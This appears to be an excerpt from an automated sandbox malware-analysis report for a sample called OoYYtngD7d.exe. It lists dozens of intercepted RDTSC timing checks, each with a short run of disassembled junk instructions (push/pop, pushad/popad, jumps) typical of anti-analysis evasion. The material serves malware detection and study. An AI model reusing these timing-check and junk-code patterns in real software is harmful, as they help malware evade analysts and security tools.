Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05AA7 second address: D05AC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD79156837h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05C39 second address: D05C43 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05C43 second address: D05C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05C49 second address: D05C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, 40C984B9h 0x00000011 lea eax, dword ptr [ebp+1248666Ch] 0x00000017 pushad 0x00000018 mov ecx, dword ptr [ebp+122D3BBEh] 0x0000001e jmp 00007FDD78DE46B0h 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 ja 00007FDD78DE46ACh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05C8F second address: D05C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05C96 second address: CE7032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDD78DE46A6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FDD78DE46A8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 ja 00007FDD78DE46A7h 0x0000002f call dword ptr [ebp+122D269Dh] 0x00000035 jmp 00007FDD78DE46B6h 0x0000003a pushad 0x0000003b pushad 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e jmp 00007FDD78DE46B1h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D41F5D second address: D41F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D420FF second address: D4210F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4210F second address: D42128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FDD7915682Bh 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D423D4 second address: D423DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D42522 second address: D4253B instructions: 0x00000000 rdtsc 0x00000002 je 00007FDD79156826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FDD7915682Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4253B second address: D4253F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4253F second address: D4254B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4254B second address: D42551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D42551 second address: D4256B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156836h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D427F6 second address: D42802 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD78DE46A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44D0D second address: D44D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD79156830h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDD79156830h 0x00000012 jo 00007FDD79156826h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44D3E second address: D44D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FDD78DE46A6h 0x00000009 jmp 00007FDD78DE46B7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44D60 second address: D44D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDD79156832h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44ED5 second address: D44EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46B2h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44EF2 second address: D44EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44EF6 second address: D44EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44EFC second address: D44F1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDD79156838h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44F1F second address: D44F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D44F26 second address: D44F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D497E7 second address: D497ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D497ED second address: D4983E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDD7915682Eh 0x0000000c jnl 00007FDD79156826h 0x00000012 jnc 00007FDD79156826h 0x00000018 popad 0x00000019 jmp 00007FDD79156837h 0x0000001e pushad 0x0000001f jno 00007FDD79156826h 0x00000025 jmp 00007FDD7915682Dh 0x0000002a push eax 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4938D second address: D493A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FDD78DE46AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D493A8 second address: D493C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156830h 0x00000007 jns 00007FDD79156826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D743 second address: D4D749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D749 second address: D4D755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FDD79156826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D755 second address: D4D770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FDD78DE46A6h 0x00000009 jmp 00007FDD78DE46B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D770 second address: D4D78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDD7915682Fh 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D78B second address: D4D7D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FDD78DE46A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDD78DE46B3h 0x00000011 push ebx 0x00000012 jng 00007FDD78DE46A6h 0x00000018 jmp 00007FDD78DE46AEh 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDD78DE46ADh 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D7D1 second address: D4D7D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D92F second address: D4D933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4D933 second address: D4D966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156830h 0x00000007 jmp 00007FDD7915682Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jnc 00007FDD79156826h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a jc 00007FDD79156826h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4DF41 second address: D4DF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4DF4B second address: D4DF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FDD79156832h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4DF68 second address: D4DF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D4DF6C second address: D4DF72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5376D second address: D53789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46B8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D53789 second address: D5379C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5379C second address: D537EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B1h 0x00000007 pushad 0x00000008 jng 00007FDD78DE46A6h 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FDD78DE46A6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jno 00007FDD78DE46A8h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDD78DE46B3h 0x00000027 jmp 00007FDD78DE46ABh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D537EA second address: D537EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D537EE second address: D537F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D53AED second address: D53AFE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD7915682Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D056BF second address: D056C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D056C5 second address: D056CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D056CA second address: D056D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D056D8 second address: D056DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D056DE second address: D056E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D53F0D second address: D53F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D53F15 second address: D53F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D53F19 second address: D53F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D53F1F second address: D53F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D54AE1 second address: D54AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D57962 second address: D57972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D57972 second address: D57976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5CEBE second address: D5CEC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5CEC4 second address: D5CEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5D005 second address: D5D00C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5D69E second address: D5D6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD79156835h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5D6B9 second address: D5D6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FDD78DE46A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5D6C7 second address: D5D6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5DCA4 second address: D5DCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5DCAF second address: D5DCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5DCB3 second address: D5DCC0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5DCC0 second address: D5DCC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5E852 second address: D5E856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5E856 second address: D5E85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5EB19 second address: D5EB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5EB1D second address: D5EB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5EB21 second address: D5EB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5EB27 second address: D5EB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5EB2D second address: D5EB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D5EB31 second address: D5EB5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156839h 0x00000007 jbe 00007FDD79156826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FDD79156826h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D680AD second address: D680BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FDD78DE46A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6738C second address: D67390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D674F4 second address: D67506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D67506 second address: D6750A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6750A second address: D67510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D67510 second address: D67525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FDD79156828h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D67525 second address: D6752B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6752B second address: D6753B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD7915682Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D677BC second address: D677F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD78DE46B8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D677F1 second address: D677F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D677F5 second address: D677FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D677FB second address: D67807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FDD79156826h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D67807 second address: D6780B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D67966 second address: D67976 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDD79156826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D67976 second address: D6798F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDD78DE46AEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6798F second address: D6799B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDD79156826h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6A3F4 second address: D6A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
